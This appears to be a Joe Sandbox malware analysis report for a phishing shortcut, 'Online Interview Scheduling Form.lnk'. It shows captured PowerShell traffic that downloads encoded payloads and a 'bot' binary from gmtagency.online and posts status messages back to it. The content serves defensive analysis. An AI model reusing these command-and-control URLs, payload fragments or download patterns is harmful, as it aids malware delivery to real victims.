server-timing: cfL4;desc="?proto=TCP&rtt=19811&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1008&delivery_rate=146796&cwnd=32&unsent_bytes=0&cid=1647d6dc412ebdf8&ts=728&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:06 UTC	391	OUT	GET /file2/84e009c5e29882323580b7c700d6d7fbf207df368df023a607710ca7f4c16856cff97b78654a883999182a054047890c863ba38cd142dc11cce8f76106379ad2e15601f04be4f6408483c515afddf40f1a60a87185af95c3d6e14b1b85f1d36ed69abb735a67351e2128ffb73d449c3b HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Connection: Keep-Alive
2024-11-15 00:01:06 UTC	1066	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:06 GMT Content-Type: application/octet-stream Content-Length: 12132 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jf2lfzkTRZQkoctDBNF0lx%2BJY6WiyTlHfTgA%2B10YeG91Ii0Z3QeY1Fb3kj2W7jyaT7id6YdjzAut7h%2FEq%2FRvVAxEkAapE4QqCAmYCYk5iWZ%2BKJf0mVTXYX9rQ4UKMaIU4lpAgP9xiI5p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24228&sent=7954&recv=4680&lost=0&retrans=286&sent_bytes=10249689&recv_bytes=782252&delivery_rate=28883424&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6ffdb89e673-DEN server-timing: cfL4;desc="?proto=TCP&rtt=22473&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1005&delivery_rate=129009&cwnd=32&unsent_bytes=0&cid=ee70d1f578f1a436&ts=701&x=0"
2024-11-15 00:01:06 UTC	303	IN	Data Raw: 25 74 72 63 6c 67 72 74 6b 71 65 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 57 65 32 4f 6d 4f 47 4f 54 71 53 57 57 4b 48 57 45 40 34 52 47 4b 34 50 59 4b 50 54 31 47 71 55 47 4c 76 65 44 79 55 4c 49 53 4c 54 7b 43 31 55 47 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 54 6f 6d 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 75 5b 63 55 6d 73 5b 57 4f 43 4e 54 6d 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 4f 47 4f 54 71 53 57 57 4b 48 57 45 40 34 52 47 4b Data Ascii: %trclgrtkqe<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VWe2OmOGOTqSWWKHWE@4RGK4PYKPT1GqUGLveDyULISLT{C1UGOKO1SSc3eKP1GoRTOC[1mHTommTUCMRTOC[1mEPVeKP1H2SGGw[1mEPVeKP1GoRTOC[1mEPVu[cUms[WOCNTmETl4hS{mqVWe2OmOGOTqSWWKHWE@4RGK
2024-11-15 00:01:06 UTC	1369	IN	Data Raw: 45 50 56 65 4b 50 31 47 6f 54 30 62 30 4c 6c 48 78 65 46 79 4c 57 6c 53 72 56 56 79 4a 63 46 4f 58 57 6c 79 6b 4c 30 47 6f 55 47 5b 56 64 56 47 55 50 56 75 6a 56 44 71 76 52 54 4c 79 55 6d 71 58 54 6c 38 68 4c 6d 47 6f 57 54 62 34 64 6c 53 45 50 59 53 55 53 30 5b 6e 56 6a 65 56 64 56 4f 34 50 56 75 69 53 30 5b 6e 56 6a 65 56 64 56 4f 34 50 59 53 53 63 55 6d 73 5b 57 4f 43 60 30 6d 75 4e 56 75 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 4e 60 46 53 49 55 6c 38 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 4f 56 60 44 57 57 63 44 71 42 54 6c 75 4e 54 6d 4b 55 50 56 6d 52 56 44 71 34 58 6b 4f 4b 5b 31 71 46 4e 49 57 52 56 46 69 70 56 6d 69 42 4c 46 Data Ascii: EPVeKP1GoT0b0LlHxeFyLWlSrVVyJcFOXWlykL0GoUG[VdVGUPVujVDqvRTLyUmqXTl8hLmGoWTb4dlSEPYSUS0[nVjeVdVO4PVuiS0[nVjeVdVO4PYSScUms[WOC`0muNVumTUCMRTOC[1mEPVeKP1H4SGGw[1mEPVeKP1GoRTeN`FSIUl8me{CMRTOC[1mEPVeKP1GoRTOC[0OV`DWWcDqBTluNTmKUPVmRVDq4XkOK[1qFNIWRVFipVmiBLF
2024-11-15 00:01:06 UTC	1369	IN	Data Raw: 58 6b 4b 35 60 30 71 58 52 56 65 50 54 31 4b 68 57 55 4f 72 64 6c 53 49 57 6f 53 4c 60 33 79 50 55 46 79 42 60 46 53 49 60 46 53 51 60 6f 43 48 56 6d 69 52 57 57 71 59 4c 59 65 57 53 31 58 76 58 54 4f 6f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 55 6f 5b 68 57 31 71 76 58 6c 30 57 5b 33 53 49 60 46 79 4b 52 47 4b 72 58 6d 69 43 5b 30 71 75 4e 59 4f 60 53 30 5b 34 52 54 69 42 60 46 53 49 5b 33 65 5b 57 7b 57 73 52 54 65 60 62 46 4b 49 57 56 65 68 63 54 5b 31 56 6d 4f 42 4c 46 4b 34 50 6c 34 60 56 47 47 6f 5b 44 65 6e 63 44 6d 49 56 6b 47 68 53 32 65 6f 58 31 65 46 4c 46 47 43 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 43 4e 54 6d 47 62 49 5b 69 57 7b 53 31 57 54 65 46 4c 46 47 45 50 59 53 57 53 31 58 Data Ascii: XkK5`0qXRVePT1KhWUOrdlSIWoSL`3yPUFyB`FSI`FSQ`oCHVmiRWWqYLYeWS1XvXTOobDSSc14E`TGoRTOC`jmGUo[hW1qvXl0W[3SI`FyKRGKrXmiC[0quNYO`S0[4RTiB`FSI[3e[W{WsRTe`bFKIWVehcT[1VmOBLFK4Pl4`VGGo[DencDmIVkGhS2eoX1eFLFGCLDuKP1GoRTORcVGYdFyWS1XvXTOCNTmGbI[iW{S1WTeFLFGEPYSWS1X
2024-11-15 00:01:06 UTC	1369	IN	Data Raw: 56 65 4b 63 44 71 33 58 6b 4f 52 58 30 54 78 57 6c 71 6a 56 44 71 76 5b 44 69 72 53 47 71 59 4f 55 43 60 56 44 6d 34 52 56 6d 43 65 47 44 78 64 46 69 6b 4c 31 30 6f 52 56 75 46 65 56 53 49 63 45 4b 69 56 44 6e 79 58 7b 47 42 64 56 48 78 54 6b 47 5b 4c 30 47 71 52 54 69 32 5b 30 58 78 60 46 79 6b 63 57 57 31 57 45 4b 4a 62 57 71 59 55 6b 43 4b 52 49 4f 6f 52 6a 58 35 65 57 71 49 63 49 71 6b 53 32 69 6e 5b 57 54 30 60 46 4b 59 57 56 65 4c 57 7b 57 72 52 54 4f 4a 56 46 47 59 4f 56 75 68 4c 33 53 37 52 54 57 52 63 47 71 75 57 6f 57 60 53 30 5b 34 52 56 6d 42 4e 54 53 53 63 33 75 69 56 44 34 55 5b 47 62 30 65 56 47 59 4f 56 34 4b 53 45 43 6f 52 6a 65 60 60 46 4b 48 55 6c 79 51 65 7b 43 4d 58 57 65 5b 5b 31 75 45 54 6b 4f 69 57 7b 57 73 58 6b 4f 6a 64 6d 4b 49 Data Ascii: VeKcDq3XkORX0TxWlqjVDqv[DirSGqYOUC`VDm4RVmCeGDxdFikL10oRVuFeVSIcEKiVDnyX{GBdVHxTkG[L0GqRTi2[0Xx`FykcWW1WEKJbWqYUkCKRIOoRjX5eWqIcIqkS2in[WT0`FKYWVeLW{WrRTOJVFGYOVuhL3S7RTWRcGquWoW`S0[4RVmBNTSSc3uiVD4U[Gb0eVGYOV4KSECoRje``FKHUlyQe{CMXWe[[1uETkOiW{WsXkOjdmKI
2024-11-15 00:01:06 UTC	516	IN	Data Raw: 30 72 62 30 71 56 50 6c 69 6a 53 33 65 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 4b 6b 52 44 4b 7b 5b 57 4f 42 56 57 50 79 52 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 63 49 5b 68 60 55 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 56 6f 43 68 53 30 5b 45 5b 57 69 52 63 46 4f 34 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64 59 4f 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 75 58 57 65 35 63 47 47 74 63 45 43 60 56 44 34 68 52 6a 65 72 5b 44 6d 44 4c 46 65 4a 53 30 71 76 58 Data Ascii: 0rb0qVPlijS3evSGGwUjOqPVeKP1GoRTOC[1m4PjKkRDK{[WOBVWPyRVe`W{WpX34re3SIcI[h`UmsVmeNdVWXPkCiW{m0SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIVoChS0[E[WiRcFO4OT0`W{Wt[DeoO1mEToCMdYOvRTi{UjOqPVeKP1GoRTOC[1mEPVeKP0KuXWe5cGGtcEC`VD4hRjer[DmDLFeJS0qvX
2024-11-15 00:01:07 UTC	1369	IN	Data Raw: 50 7b 57 6b 43 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 7b 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 55 57 6c 69 47 57 56 79 4a 50 6d 4b 73 55 6d 4b 52 54 31 47 71 57 6a 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 52 6a 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 33 65 6a 4c 6a 5b 37 52 54 69 42 64 56 48 78 55 6c 79 6b 4c 31 34 72 56 6a 4f 42 60 46 4b 75 54 56 65 6b 4c 6a 58 78 56 6d 65 53 5b 30 6d 58 55 56 65 4a 53 55 6a 79 5b 44 69 42 4c 56 53 47 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 6d 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6f 6d 60 56 47 48 79 58 33 31 31 5b 31 71 48 54 6f 6d 6a 57 30 57 4e 50 33 6d 43 5b Data Ascii: P{WkCkRGXvTl0rb0qVPlijS3e{RTORcVGYdFySclvvVmiObDSSc14E`TGoRTOC[1mEPVeUWliGWVyJPmKsUmKRT1GqWjencDmIVoChS0WoRjWreVOHWkCRcVy{Vm[B`FSI[3ejLj[7RTiBdVHxUlykL14rVjOB`FKuTVekLjXxVmeS[0mXUVeJSUjy[DiBLVSGVoChS0[SVWiRc1moLDuKP1GoRTOC[1mEPom`VGHyX311[1qHTomjW0WNP3mC[
2024-11-15 00:01:07 UTC	1369	IN	Data Raw: 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 47 4b 34 5b 57 69 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 55 56 6d 62 79 65 6c 53 75 57 59 53 55 56 47 4b 72 58 6d 4f 43 65 47 57 49 53 6b 43 69 50 31 47 73 56 6a 65 56 64 6c 53 49 63 49 57 5b 56 47 4b 76 58 6b 48 31 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 55 6c 69 6a 53 31 34 77 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 Data Ascii: oRTOC[1mEPVeKPUCMRTOC[1mEPVeKP1GoRTOC[1mEPVeKRGK4[Wi{UjOoLDuKP1GoRTOC[1mEPVeKP1GoRTOC[1mEPVeKP1KUVmbyelSuWYSUVGKrXmOCeGWISkCiP1GsVjeVdlSIcIW[VGKvXkH1O1SSc3eKP1GoRTOC[1mEPVeKP1GoRTOC[3[SLDuKP1GoRTOC[1mEPVeKP1GoRTOC[1mIUlijS14w[YbvR1mEPVeKP1GoRTOC[1mEPVeKP1
2024-11-15 00:01:07 UTC	1369	IN	Data Raw: 64 46 79 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 55 56 6d 62 79 65 6c 53 75 57 59 53 55 56 47 4b 72 58 6d 4f 43 65 47 57 49 53 6b 43 69 50 31 47 73 5b 44 65 56 65 46 4f 47 56 6f 43 68 53 30 57 6f 55 47 57 60 65 6c 4f 75 55 6c 79 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 6d 49 57 6f 4f 6b 4c 6d 57 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 57 72 56 57 4b 46 52 6d 4f 53 57 57 71 44 57 57 57 57 5b 31 6d 73 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 31 6d 49 56 6c 69 69 57 32 69 72 56 6a 53 77 5b 31 71 48 57 6f 6d 68 50 31 6d 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d Data Ascii: dFyK`oONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KUVmbyelSuWYSUVGKrXmOCeGWISkCiP1Gs[DeVeFOGVoChS0WoUGW`elOuUlyDTV8oRTOC[1mEPVeKP1GoRTOBNTmIWoOkLmWo[YbvR1mEPVeKP1GoRTOC[1mEPVeKP1GoRTWrVWKFRmOSWWqDWWWW[1msTo[jLkW{XkKF`1mIVliiW2irVjSw[1qHWomhP1mNP3mC[1mEPVeKP1GoRTOC[1m
2024-11-15 00:01:07 UTC	1369	IN	Data Raw: 30 62 30 57 47 71 59 55 6f 5b 68 63 57 4b 37 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 6d 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 6b 6d 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 30 5b 6e 53 57 57 72 52 6a 4b 52 60 31 34 52 54 6d 4f 43 60 57 4b 49 4e 55 4f 68 63 59 69 33 56 57 65 53 5b 30 71 75 53 6f 43 68 53 30 5b 73 52 54 65 46 63 56 53 49 57 6f 6d 4b 50 30 4b 31 56 57 69 6e 54 30 71 58 54 6f 6d 69 57 30 5b 37 52 54 69 4a 63 46 53 48 52 6f 43 60 56 44 30 30 Data Ascii: 0b0WGqYUo[hcWK7SGGw[1mEPVeKP1GoRTOC[1mEPkmDTV8oRTOC[1mEPVeKRECNP3mC[1mEPkmDTV8NP3mC[1mEPoC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeKP1GoT0[nSWWrRjKR`14RTmOC`WKINUOhcYi3VWeS[0quSoChS0[sRTeFcVSIWomKP0K1VWinT0qXTomiW0[7RTiJcFSHRoC`VD00
2024-11-15 00:01:07 UTC	1369	IN	Data Raw: 4f 60 57 30 4b 57 56 57 69 4e 62 6d 5b 48 52 6f 43 60 4c 6c 53 72 58 33 6d 43 65 47 47 58 54 6a 30 68 4c 6c 53 50 58 6c 71 7b 55 6a 4f 71 54 6f 71 60 56 47 48 76 58 57 62 30 63 6c 4f 34 50 55 6d 4b 53 55 57 72 5b 49 6a 79 57 47 6a 78 60 46 79 60 52 47 5b 7b 56 6d 65 52 57 57 6d 58 55 6f 4b 57 4c 6d 58 76 5b 44 65 72 65 57 6e 7b 55 6d 53 60 56 47 47 6f 55 47 57 46 62 33 4b 49 4e 55 4f 57 4c 30 4b 6e 58 33 34 52 52 6d 71 73 4e 59 57 53 63 54 58 76 5b 44 65 56 64 56 47 59 57 6f 71 4b 50 7b 47 47 58 6b 48 30 4c 47 54 7b 54 6f 5b 6b 53 56 79 75 54 6b 48 34 62 46 4b 75 5b 47 43 68 60 31 71 6e 5b 44 69 52 63 46 4f 75 63 46 79 6b 64 6f 4f 4e 50 33 79 56 65 56 4f 75 57 6c 34 69 56 44 35 76 56 6d 69 4b 65 47 54 78 55 6c 38 60 57 30 48 79 58 6a 65 56 60 30 5b 49 53 Data Ascii: O`W0KWVWiNbm[HRoC`LlSrX3mCeGGXTj0hLlSPXlq{UjOqToq`VGHvXWb0clO4PUmKSUWr[IjyWGjx`Fy`RG[{VmeRWWmXUoKWLmXv[DereWn{UmS`VGGoUGWFb3KINUOWL0KnX34RRmqsNYWScTXv[DeVdVGYWoqKP{GGXkH0LGT{To[kSVyuTkH4bFKu[GCh`1qn[DiRcFOucFykdoONP3yVeVOuWl4iVD5vVmiKeGTxUl8`W0HyXjeV`0[IS

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:08 UTC	287	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f4d4fc9b1eda516eb3c7ff9a53861116 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 140
2024-11-15 00:01:08 UTC	140	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 61 6c 66 6f 6e 73 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
2024-11-15 00:01:08 UTC	946	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:08 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qco%2BLFAeZ250kggkeX%2FbyX2OY4xfLxyKNYC%2BPqGkESHorN3bsJhiXA5H0jbiwtX4eLUurdJ75gVQhb6FE8h9%2BGVTfpTx0OybqxnTBSeU3XYjWnkjkLWxbfQ4hgwwJYJKiANKYT6KZScM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5852&sent=16216&recv=8657&lost=0&retrans=0&sent_bytes=22195914&recv_bytes=786030&delivery_rate=48105922&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af7099a43839e-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1087&delivery_rate=1869593&cwnd=251&unsent_bytes=0&cid=4ea95e20db5618b2&ts=659&x=0"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Online Interview Scheduling Form.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

Windows Analysis Report
Online Interview Scheduling Form.lnk

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:21 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f4d4fc9b1eda516eb3c7ff9a53861116 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 69
2024-11-15 00:01:21 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-11-15 00:01:21 UTC	950	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:21 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gpnilf2HAwEPxJUIrTIST1f%2Bqu%2Br9iWS8K0jM8cFD%2FNo7RRnMkr1HUoSLtQY3xOnMYoQ%2FmigqtADEZ2zz7S3PY6OG2%2FsG7Ri1c3rzz9ThrWYnjNzOqDeRUVO1fPKldcmXqWs9HZUdpF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7135&sent=34203&recv=17747&lost=0&retrans=46&sent_bytes=47478823&recv_bytes=772340&delivery_rate=49415384&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af75b48ab0c0b-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1015&delivery_rate=1779963&cwnd=251&unsent_bytes=0&cid=49574126df1a13a2&ts=694&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:22 UTC	335	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec469cb660094eba33581c6dea113fbc01c861a0f732c16a5d6a1c436c513590ee7ddfc594f22cd2ed0767e9af9a14520fa71c6f1ceccf1991e36a5391763db9ad6583f43343277a3bbe69d7a76e3b9c488ab HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online
2024-11-15 00:01:23 UTC	1065	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:23 GMT Content-Type: application/octet-stream Content-Length: 8351232 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F8Suq8yWGhyH%2FDmZ3qSY%2BriqSiihHjJNETcoao6qtD4gvkC%2BsqpymZ8AMF1HFOMdjZLYtSiy2OXFVQqSnFMZxVyMjXe5EXOxQwzHsvecDkDMcgQtE7aU1IFfRzwo7XMa6VEJ4fD9KlX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13807&sent=16229&recv=8671&lost=0&retrans=0&sent_bytes=22199237&recv_bytes=794391&delivery_rate=48105922&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af763f91d2e17-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=973&delivery_rate=1673021&cwnd=245&unsent_bytes=0&cid=e43394920b26d164&ts=683&x=0"
2024-11-15 00:01:23 UTC	304	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23 Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
